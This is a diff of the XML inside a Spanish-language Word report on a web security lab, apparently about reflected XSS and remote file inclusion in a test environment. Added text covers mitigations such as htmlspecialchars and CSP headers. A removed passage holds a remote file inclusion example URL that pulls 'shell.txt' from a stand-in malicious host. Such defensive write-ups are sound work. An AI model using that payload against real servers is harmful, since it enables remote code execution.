           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB35044" wp14:editId="70D0FFF6">
-            <wp:extent cx="5400040" cy="1381760"/>
-            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
-            <wp:docPr id="1588174640" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BAF02C" wp14:editId="246378BB">
+            <wp:extent cx="5398108" cy="1310185"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="839236603" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6405,11 +5205,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="896840093" name=""/>
+                    <pic:cNvPr id="839236603" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6417,7 +5217,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="1381760"/>
+                      <a:ext cx="5436809" cy="1319578"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6432,163 +5232,212 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">En definitiva, se comprueba que este entorno de prueba, es vulnerable a ataques XSS-Reflected, siendo necesario resaltar que en un </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>entorno de producción</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> debería haber una fase anterior, donde se usan técnicas de ingeniería social. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
+          <w:kern w:val="0"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
+          <w:kern w:val="0"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>3.2.1.- Explicación</w:t>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.- Mitigación del riesgo</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">Como ya se ha explicado anteriormente, este código presenta vulnerabilidades, ya que realiza una validación y filtrado de entrada muy básico, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>pudiendo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ser explotado</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> por diferentes caracteres, incluso con el envío de código PHP malicioso, que puede ser ejecutado remotamente por parte de un atacante, como, por ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId23" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hipervnculo"/>
-            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-            <w:kern w:val="0"/>
-            <w:sz w:val="24"/>
-            <w:szCs w:val="24"/>
-            <w:lang w:eastAsia="es-ES"/>
-            <w14:ligatures w14:val="none"/>
-          </w:rPr>
-          <w:t>http://example.com/index.php?page=http://malicious.com/shell.txt</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>2.2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>. Recomendaciones</w:t>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para mitigar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">los efectos de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">esta vulnerabilidad, es </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>importante</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> validar y sanitizar todas las entradas del usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, con alguna/s de las siguientes recomendaciones:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6596,7 +5445,7 @@
         <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="31"/>
+          <w:numId w:val="45"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
@@ -6618,7 +5467,95 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Deshabilitar la opción </w:t>
+        <w:t xml:space="preserve">En lugar de intentar eliminar etiquetas específicas </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> es más seguro utilizar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>comandos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">de programación </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">como </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6631,90 +5568,137 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>allow_url_include</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:i/>
-          <w:iCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> en la configuración de PHP: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ES una directiva de configuración de PHP que permite o prohíbe la inclusión de archivos remotos en un script PHP. Si está habilitado, un atacante podría incluir un archivo remoto malicioso y ejecutar código arbitrario en el servidor. Por lo tanto, es una buena práctica deshabilitar esta </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>configuración para</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> evitar posibles vulnerabilidades de seguridad</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>`htmlspecialchars`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para escapar caracteres especiales de HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, convirtiendo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>caracteres como `&lt;`, `&gt;`, `&amp;`, `"`, y `'` en entidades HTML, lo que previene la ejecución de código malicioso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="45"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Inclusión en el código de la </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cabecera `Content-Security-Policy`</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CSP)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, que permite especificar fuentes de confianza para diferentes tipos de recursos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ayudando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>a mitigar los ataques de inyección, incluidos los XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6731,21 +5715,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -6757,10 +5726,10 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42602DB7" wp14:editId="1D9133AF">
-            <wp:extent cx="5692296" cy="2222205"/>
-            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
-            <wp:docPr id="1515471119" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E91CC22" wp14:editId="2F3C1547">
+            <wp:extent cx="4920018" cy="452120"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="555043255" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6768,7 +5737,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1515471119" name=""/>
+                    <pic:cNvPr id="555043255" name=""/>
